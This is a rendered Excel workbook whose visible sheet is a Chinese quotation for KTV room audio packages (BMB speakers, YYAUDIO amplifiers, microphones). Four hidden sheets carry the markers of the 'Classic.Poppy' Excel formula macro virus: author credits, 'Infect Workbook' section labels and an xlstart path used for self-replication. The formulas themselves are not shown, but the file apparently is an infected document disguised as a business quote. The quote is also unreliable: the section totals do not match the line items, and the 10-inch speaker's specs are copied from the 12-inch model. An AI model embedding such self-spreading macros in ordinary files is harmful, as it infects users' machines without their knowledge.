{"text_format":"3","workbook":"xls","n_sheets":5,"sheets":["KTV部分","OIKDSEYN","YYHRMQPY","RRYPQNJS","RYYRMJLB"],"not_rendered":{"images":24,"external_links":40,"defined_names":190},"read":"whole","date_system":"1900","formulas":"cached_only"}

{"sheet":"KTV部分","index":0,"n_rows":29,"n_cols":10,"rows_kept":29,"merged":[[0,0,0,9],[2,0,2,9],[9,1,9,7],[10,0,10,9],[18,1,18,7],[19,0,19,9],[28,1,28,7]],"flags":["formulas_cached_only"]}
["BMB CSS KTV包房方案"]
["序号","设备名称","品牌","型号","技术参数","单位","数量","单价","小计","类似图"]
["一、小房音响系统"]
[1,"10寸主扩声音箱","BMB","css-2010","低音纸盆采用日本产松压编织鼓纸。\n・箱体吊装金属件适应于PA音箱方式及KTV音箱方式多种设置可能。\n・适应多种场景设置，BMB logo牌及WOOFER/TWEETER采用可旋转结构。\n●精密驱动振动膜采用日本产窒化钛材料。钛箔经窒化处理后产生的超硬化效果，可使播放音乐时可听频率响应达到优秀音质不可或缺的超高音范围。\n●采用45mm大口径线圈（CSS-2010为35mm口径）使产品耐久性及强有力驱动并驾齐驱。电线采用纯铝制线，利用平角成形技术实现超轻分量，反应灵敏的高效率驱动。与超轻窒化钛振动膜相结合，迅速反应还原超高音域。\n●采用75mm大口径线圈（CSS-2010为60mm口径），耐久性及强有力驱动并驾齐驱。采用极粗口径0.37mm纯铝电线（CSS-2010中为口径0.32mm铜包铝线），超轻分量反应灵敏，动感音质绝无失真。\n●接线部分采用高可信赖度nutrick speakon端口。\n●采用多层聚合板材保证了悠扬音质。表面采用耐磨涂层。\n \n CSS-2010产品参数 \n系统构造 单低音单高音的2单元扬声器系统               \n低音单元 300mm（12inch）錐形低音，65（2.5inch）mm音圈 × 1unit   高音单元 26mm喉口，44.4mm音圈音膜组装高音 × 1unit           \n频率响应 50Hz～20.000Hz(±3dB)                   \n灵敏度   98dB/W/m                 \n峰值最大声压级 133dB/m           \n长期连续最大声压 127dB/m           \n最大输入功率 2000W               \n额定输入功率 500W(PublicAddresses speaker type)             \n推荐放大器   800W(DAP-8000)               \n高频保护     热敏电阻回路断路器               \n水平指向角   80°                   \n垂直指向角   50°                   \n连接插口     Neutrik Speakon? NL4MP×2           \n阻抗         8Ω             \n尺寸 (mm)    380(W) × 615(H) × 386(D)                 \n重量         24.6 kg/个                 \n板材         15mm 桦木夹板               \n面网         5.5mm正六边形孔                   \n油漆         防刮烤漆                   \n支撑座     底部φ36mm支撑底座","只",2,3900,7800]
[2,"单18寸低音音箱","YYAUDIO","YA18B","频率响应   35Hz-150Hz\n单元组成   1×18＂(460mm)/4＂voice coil LF\n额定功率   600W RMS,2400W peak\n灵敏度   100dB 1watt/1 metre\n声压级   128dB continuous,134 dB peak\n额定阻抗   8 ohms nominal\n输入方式   2×Speakon NL4\n包装尺寸   835mm×645mm×750mm\n净重   49.6 kg/pc","只",1,3200,3200]
[3,"纯后级功放","YYAUDIO","UA1200","输出功率 立体声8Ω+8Ω：2×600W，输出功率立体4Ω+4Ω：2×900W输出功率 桥接方式8Ω：1800W 频率响应：20Hz－20kHz阻抗：20KΩ，输入灵敏度：0.775V，1.0V,1.55V ，信噪比：>105dB，阻尼系数（8Ω）：>300，供电电源：220V/AC/50Hz，","台",2,2200,4400]
[4,"前级效果器","YYAUDIO","KA500","超低音输出具有低切、高切、独立音量控制、自动增益控制等处理模块 *24-bit、48kHz采样率、∑-△ AD/DA转换、32位DSP芯片处理","台",1,1200,1200]
[5,"无线麦克风","BBS","SA380","• 流线型外观设计，人性化操作界面，美观大方\n• 高清TRM蓝色液晶显示屏，直观明了；\n• 采用国际顶级高性能音频处理芯片，超低失真声音处理电路设计\n• 超高动态双压缩分流技术，将高低频自动分流加载，展现最佳动态特性\n• 采用PLL双频道锁相环回路设计，ID码锁定自选频道功能；\n声音曲线经过精心调教，声音温暖通透；\n• 可选工作频点，并与之相配备对应预设模组，简易安装操作；\nA：500个可选工作频点，110个预设模组\nB：800个可选工作频点，121个预设模组\nC：1000个可选工作频点，159个预设模组\n","套",1,1350,1350]
[6,"有线立式麦克风","Shure","55SH SeriesII","动圈式人声和演唱话筒，60余年完美无瑕的舞台象征。55SH话筒拥有独具个性的镀铬印模压铸盒，散发出二十世纪五、6十年代的经典款式与风格，50HZ-15KHZ。\n","套",1,1900,1900]
[7,"合计",{"$nulls":6},25000]
["二、中房音响系统"]
[1,"1２寸主扩声音箱","BMB","css-2012","・箱体吊装金属件适应于PA音箱方式及KTV音箱方式多种设置可能。\n・适应多种场景设置，BMB logo牌及WOOFER/TWEETER采用可旋转结构。\n●精密驱动振动膜采用日本产窒化钛材料。钛箔经窒化处理后产生的超硬化效果，可使播放音乐时可听频率响应达到优秀音质不可或缺的超高音范围。\n●采用45mm大口径线圈（CSS-2010为35mm口径）使产品耐久性及强有力驱动并驾齐驱。电线采用纯铝制线，利用平角成形技术实现超轻分量，反应灵敏的高效率驱动。与超轻窒化钛振动膜相结合，迅速反应还原超高音域。\n●采用75mm大口径线圈（CSS-2010为60mm口径），耐久性及强有力驱动并驾齐驱。采用极粗口径0.37mm纯铝电线（CSS-2010中为口径0.32mm铜包铝线），超轻分量反应灵敏，动感音质绝无失真。\n●接线部分采用高可信赖度nutrick speakon端口。\n●采用多层聚合板材保证了悠扬音质。表面采用耐磨涂层。\n \n CSS-2012产品参数 \n系统构造 单低音单高音的2单元扬声器系统               \n低音单元 300mm（12inch）錐形低音，65（2.5inch）mm音圈 × 1unit   高音单元 26mm喉口，44.4mm音圈音膜组装高音 × 1unit           \n频率响应 50Hz～20.000Hz(±3dB)                   \n灵敏度   98dB/W/m                 \n峰值最大声压级 133dB/m           \n长期连续最大声压 127dB/m           \n最大输入功率 2000W               \n额定输入功率 500W(PublicAddresses speaker type)             \n推荐放大器   800W(DAP-8000)               \n高频保护     热敏电阻回路断路器               \n水平指向角   80°                   \n垂直指向角   50°                   \n连接插口     Neutrik Speakon? NL4MP×2           \n阻抗         8Ω             \n尺寸 (mm)    380(W) × 615(H) × 386(D)                 \n重量         24.6 kg/个                 \n板材         15mm 桦木夹板               \n面网         5.5mm正六边形孔                   \n油漆         防刮烤漆                   \n支撑座     底部φ36mm支撑底座","只",2,4300,8600]
[2,"单18寸低音音箱","YYAUDIO","YA18B","频率响应   35Hz-150Hz\n单元组成   1×18＂(460mm)/4＂voice coil LF\n额定功率   600W RMS,2400W peak\n灵敏度   100dB 1watt/1 metre\n声压级   128dB continuous,134 dB peak\n额定阻抗   8 ohms nominal\n输入方式   2×Speakon NL4\n包装尺寸   835mm×645mm×750mm\n净重   49.6 kg/pc","只",1,3200,3200]
[3,"纯后级功放","YYAUDIO","UA1600","输出功率 立体声8Ω+8Ω：2×800W，输出功率立体4Ω+4Ω：2×1100W输出功率 桥接方式8Ω：2000W 频率响应：20Hz－20kHz阻抗：20KΩ，输入灵敏度：0.775V，1.0V,1.55V ，信噪比：>105dB，阻尼系数（8Ω）：>300，供电电源：220V/AC/50Hz，","台",1,2500,2500]
[4,"纯后级功放","YYAUDIO","UA1200","输出功率 立体声8Ω+8Ω：2×600W，输出功率立体4Ω+4Ω：2×900W输出功率 桥接方式8Ω：1800W 频率响应：20Hz－20kHz阻抗：20KΩ，输入灵敏度：0.775V，1.0V,1.55V ，信噪比：>105dB，阻尼系数（8Ω）：>300，供电电源：220V/AC/50Hz，","台",1,2200,2200]
[5,"前级效果器","YYAUDIO","KA500","超低音输出具有低切、高切、独立音量控制、自动增益控制等处理模块 *24-bit、48kHz采样率、∑-△ AD/DA转换、32位DSP芯片处理","台",1,1200,1200]
[6,"无线麦克风","BBS","SA380","• 流线型外观设计，人性化操作界面，美观大方\n• 高清TRM蓝色液晶显示屏，直观明了；\n• 采用国际顶级高性能音频处理芯片，超低失真声音处理电路设计\n• 超高动态双压缩分流技术，将高低频自动分流加载，展现最佳动态特性\n• 采用PLL双频道锁相环回路设计，ID码锁定自选频道功能；\n声音曲线经过精心调教，声音温暖通透；\n• 可选工作频点，并与之相配备对应预设模组，简易安装操作；\nA：500个可选工作频点，110个预设模组\nB：800个可选工作频点，121个预设模组\nC：1000个可选工作频点，159个预设模组\n","套",1,1350,1350]
[7,"有线立式麦克风","Shure","55SH SeriesII","动圈式人声和演唱话筒，60余年完美无瑕的舞台象征。55SH话筒拥有独具个性的镀铬印模压铸盒，散发出二十世纪五、6十年代的经典款式与风格，50HZ-15KHZ。\n","套",1,1900,1900]
[8,"合计",{"$nulls":6},29000]
["三、大房音响系统"]
[1,"1２寸主扩声音箱","BMB","css-2012","・箱体吊装金属件适应于PA音箱方式及KTV音箱方式多种设置可能。\n・适应多种场景设置，BMB logo牌及WOOFER/TWEETER采用可旋转结构。\n●精密驱动振动膜采用日本产窒化钛材料。钛箔经窒化处理后产生的超硬化效果，可使播放音乐时可听频率响应达到优秀音质不可或缺的超高音范围。\n●采用45mm大口径线圈（CSS-2010为35mm口径）使产品耐久性及强有力驱动并驾齐驱。电线采用纯铝制线，利用平角成形技术实现超轻分量，反应灵敏的高效率驱动。与超轻窒化钛振动膜相结合，迅速反应还原超高音域。\n●采用75mm大口径线圈（CSS-2010为60mm口径），耐久性及强有力驱动并驾齐驱。采用极粗口径0.37mm纯铝电线（CSS-2010中为口径0.32mm铜包铝线），超轻分量反应灵敏，动感音质绝无失真。\n●接线部分采用高可信赖度nutrick speakon端口。\n●采用多层聚合板材保证了悠扬音质。表面采用耐磨涂层。\n \n CSS-2012产品参数 \n系统构造 单低音单高音的2单元扬声器系统               \n低音单元 300mm（12inch）錐形低音，65（2.5inch）mm音圈 × 1unit   高音单元 26mm喉口，44.4mm音圈音膜组装高音 × 1unit           \n频率响应 50Hz～20.000Hz(±3dB)                   \n灵敏度   98dB/W/m                 \n峰值最大声压级 133dB/m           \n长期连续最大声压 127dB/m           \n最大输入功率 2000W               \n额定输入功率 500W(PublicAddresses speaker type)             \n推荐放大器   800W(DAP-8000)               \n高频保护     热敏电阻回路断路器               \n水平指向角   80°                   \n垂直指向角   50°                   \n连接插口     Neutrik Speakon? NL4MP×2           \n阻抗         8Ω             \n尺寸 (mm)    380(W) × 615(H) × 386(D)                 \n重量         24.6 kg/个                 \n板材         15mm 桦木夹板               \n面网         5.5mm正六边形孔                   \n油漆         防刮烤漆                   \n支撑座     底部φ36mm支撑底座","只",2,4300,8600]
[2,"10寸主扩声音箱","BMB","css-2010","低音纸盆采用日本产松压编织鼓纸。\n・箱体吊装金属件适应于PA音箱方式及KTV音箱方式多种设置可能。\n・适应多种场景设置，BMB logo牌及WOOFER/TWEETER采用可旋转结构。\n●精密驱动振动膜采用日本产窒化钛材料。钛箔经窒化处理后产生的超硬化效果，可使播放音乐时可听频率响应达到优秀音质不可或缺的超高音范围。\n●采用45mm大口径线圈（CSS-2010为35mm口径）使产品耐久性及强有力驱动并驾齐驱。电线采用纯铝制线，利用平角成形技术实现超轻分量，反应灵敏的高效率驱动。与超轻窒化钛振动膜相结合，迅速反应还原超高音域。\n●采用75mm大口径线圈（CSS-2010为60mm口径），耐久性及强有力驱动并驾齐驱。采用极粗口径0.37mm纯铝电线（CSS-2010中为口径0.32mm铜包铝线），超轻分量反应灵敏，动感音质绝无失真。\n●接线部分采用高可信赖度nutrick speakon端口。\n●采用多层聚合板材保证了悠扬音质。表面采用耐磨涂层。\n \n CSS-2010产品参数 \n系统构造 单低音单高音的2单元扬声器系统               \n低音单元 300mm（12inch）錐形低音，65（2.5inch）mm音圈 × 1unit   高音单元 26mm喉口，44.4mm音圈音膜组装高音 × 1unit           \n频率响应 50Hz～20.000Hz(±3dB)                   \n灵敏度   98dB/W/m                 \n峰值最大声压级 133dB/m           \n长期连续最大声压 127dB/m           \n最大输入功率 2000W               \n额定输入功率 500W(PublicAddresses speaker type)             \n推荐放大器   800W(DAP-8000)               \n高频保护     热敏电阻回路断路器               \n水平指向角   80°                   \n垂直指向角   50°                   \n连接插口     Neutrik Speakon? NL4MP×2           \n阻抗         8Ω             \n尺寸 (mm)    380(W) × 615(H) × 386(D)                 \n重量         24.6 kg/个                 \n板材         15mm 桦木夹板               \n面网         5.5mm正六边形孔                   \n油漆         防刮烤漆                   \n支撑座     底部φ36mm支撑底座","只",2,3900,7800]
[3,"单18寸低音音箱","YYAUDIO","YA18B","频率响应   35Hz-150Hz\n单元组成   1×18＂(460mm)/4＂voice coil LF\n额定功率   600W RMS,2400W peak\n灵敏度   100dB 1watt/1 metre\n声压级   128dB continuous,134 dB peak\n额定阻抗   8 ohms nominal\n输入方式   2×Speakon NL4\n包装尺寸   835mm×645mm×750mm\n净重   49.6 kg/pc","只",1,3200,3200]
[4,"纯后级功放","YYAUDIO","UA1600","输出功率 立体声8Ω+8Ω：2×800W，输出功率立体4Ω+4Ω：2×1100W输出功率 桥接方式8Ω：2000W 频率响应：20Hz－20kHz阻抗：20KΩ，输入灵敏度：0.775V，1.0V,1.55V ，信噪比：>105dB，阻尼系数（8Ω）：>300，供电电源：220V/AC/50Hz，","台",1,2500,2500]
[5,"纯后级功放","YYAUDIO","UA1200","输出功率 立体声8Ω+8Ω：2×600W，输出功率立体4Ω+4Ω：2×900W输出功率 桥接方式8Ω：1800W 频率响应：20Hz－20kHz阻抗：20KΩ，输入灵敏度：0.775V，1.0V,1.55V ，信噪比：>105dB，阻尼系数（8Ω）：>300，供电电源：220V/AC/50Hz，","台",2,2200,4400]
[6,"前级效果器","YYAUDIO","KA500","超低音输出具有低切、高切、独立音量控制、自动增益控制等处理模块 *24-bit、48kHz采样率、∑-△ AD/DA转换、32位DSP芯片处理","台",1,1200,1200]
[7,"无线麦克风","BBS","SA380","• 流线型外观设计，人性化操作界面，美观大方\n• 高清TRM蓝色液晶显示屏，直观明了；\n• 采用国际顶级高性能音频处理芯片，超低失真声音处理电路设计\n• 超高动态双压缩分流技术，将高低频自动分流加载，展现最佳动态特性\n• 采用PLL双频道锁相环回路设计，ID码锁定自选频道功能；\n声音曲线经过精心调教，声音温暖通透；\n• 可选工作频点，并与之相配备对应预设模组，简易安装操作；\nA：500个可选工作频点，110个预设模组\nB：800个可选工作频点，121个预设模组\nC：1000个可选工作频点，159个预设模组\n","套",1,1350,1350]
[8,"有线立式麦克风","Shure","55SH SeriesII","动圈式人声和演唱话筒，60余年完美无瑕的舞台象征。55SH话筒拥有独具个性的镀铬印模压铸盒，散发出二十世纪五、6十年代的经典款式与风格，50HZ-15KHZ。\n","套",1,1900,1900]
[9,"合计",{"$nulls":6},43000]

{"sheet":"OIKDSEYN","index":1,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["海安全频音响.xlsm"]
["Book1"]
["C:\\PROGRA~1\\MICROS~2\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"}]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]

{"sheet":"YYHRMQPY","index":2,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["海安全频音响.xls"]
["Book1"]
["C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[3]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]

{"sheet":"RRYPQNJS","index":3,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["海安全频音响.xls"]
["Book1"]
["C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[3]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]

{"sheet":"RYYRMJLB","index":4,"n_rows":26,"n_cols":3,"rows_kept":26,"hidden":true,"flags":["formulas_cached_only"]}
["复件 海安全频音响.xls"]
["Book1"]
["C:\\Program Files\\Microsoft Office\\OFFICE11\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"}]
[]
[]
["Classic.Poppy by VicodinES"]
["With Lord Natas"]
["An Excel Formula Macro Virus (XF.Classic)"]
["Hydrocodone/APAP 10-650 For Your Computer"]
["(C) The Narkotic Network 1998"]
[]
[]
["**Simple Payload**"]
[]
[]
[null,null,"**Set Our Values and Paths**"]
[]
[]
["**Add New Workbook, Infect It, Save It As Book1.xls**"]
[]
[]
[]
[]
[]
[null,null,"**Infect Workbook**"]